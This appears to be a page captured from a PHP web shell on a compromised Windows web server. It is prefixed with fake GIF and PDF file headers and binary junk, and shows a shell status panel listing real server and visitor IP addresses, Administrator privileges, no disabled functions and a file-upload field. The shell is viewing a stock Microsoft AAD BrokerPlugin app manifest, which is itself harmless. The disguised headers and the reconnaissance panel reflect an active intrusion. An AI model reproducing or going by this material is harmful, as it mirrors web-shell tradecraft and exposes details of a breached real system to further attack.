GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/Windows/SystemApps/Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy/ |
Upload File : |
<?xml version="1.0" encoding="utf-8"?> <Package xmlns="http://schemas.microsoft.com/appx/manifest/foundation/windows10" xmlns:uap="http://schemas.microsoft.com/appx/manifest/uap/windows10" xmlns:rescap="http://schemas.microsoft.com/appx/manifest/foundation/windows10/restrictedcapabilities" xmlns:wincap="http://schemas.microsoft.com/appx/manifest/foundation/windows10/windowscapabilities" IgnorableNamespaces="uap rescap wincap"> <Identity Name="Microsoft.AAD.BrokerPlugin" Publisher="CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US" ProcessorArchitecture="neutral" ResourceId="neutral" Version="1000.19041.4239.0" /> <Properties> <DisplayName>ms-resource:PackageDisplayName</DisplayName> <PublisherDisplayName>ms-resource:PublisherDisplayName</PublisherDisplayName> <Logo>Assets\StoreLogo.png</Logo> </Properties> <Resources> <Resource Language="en-us" /> </Resources> <Applications> <Application Id="App" Executable="Microsoft.AAD.BrokerPlugin.exe" EntryPoint="BrokerPlugin.App"> <uap:VisualElements DisplayName="ms-resource:PackageDisplayName" Square150x150Logo="Assets\Logo.png" Square44x44Logo="Assets\SmallLogo.png" Description="ms-resource:PackageDescription" BackgroundColor="#ffffff" AppListEntry="none"> <uap:SplashScreen Image="Assets\SplashScreen.png" /> </uap:VisualElements> <Extensions> <uap:Extension Category="windows.webAccountProvider"> <uap:WebAccountProvider Url="https://login.windows.net" BackgroundEntryPoint="AAD.Core.TokenBackground" /> </uap:Extension> <uap:Extension Category="windows.appService" EntryPoint="AAD.Core.AppService"> <uap:AppService Name="TBAuthAppService" /> </uap:Extension> <uap:Extension Category="windows.protocol"> <uap:Protocol Name="ms-aad-brokerplugin"> <uap:DisplayName>ms-resource:PackageDisplayName</uap:DisplayName> </uap:Protocol> </uap:Extension> </Extensions> </Application> </Applications> <Dependencies> <TargetDeviceFamily Name="Windows.Universal" MinVersion="10.0.0.0" MaxVersionTested="10.0.10587.0"/> </Dependencies> <Capabilities> <Capability Name="internetClient" /> <uap:Capability Name="enterpriseAuthentication" /> <Capability Name="privateNetworkClientServer" /> <uap:Capability Name="sharedUserCertificates" /> <rescap:Capability Name="deviceManagementAdministrator" /> <rescap:Capability Name="deviceManagementRegistration" /> <rescap:Capability Name="remotePassportAuthentication" /> <rescap:Capability Name="userPrincipalName" /> <rescap:Capability Name="windowsHelloCredentialAccess" /> <!-- needed for detection of Visitor accounts using Windows::System::Internal::UserManager::GetProfileForUser --> <wincap:Capability Name="userSigninSupport" /> </Capabilities> <Extensions> <Extension Category="windows.activatableClass.inProcessServer"> <InProcessServer> <Path>AAD.Core.dll</Path> <!-- Value of ActivatableClassId should be the same as BackgroundEntryPoint value in WebAccountProvider extension. --> <ActivatableClass ActivatableClassId="AAD.Core.TokenBackground" ThreadingModel="both" /> <ActivatableClass ActivatableClassId="AAD.Core.AppService" ThreadingModel="both" /> <ActivatableClass ActivatableClassId="AAD.Core.WebAccountProcessor" ThreadingModel="both" /> </InProcessServer> </Extension> </Extensions> </Package>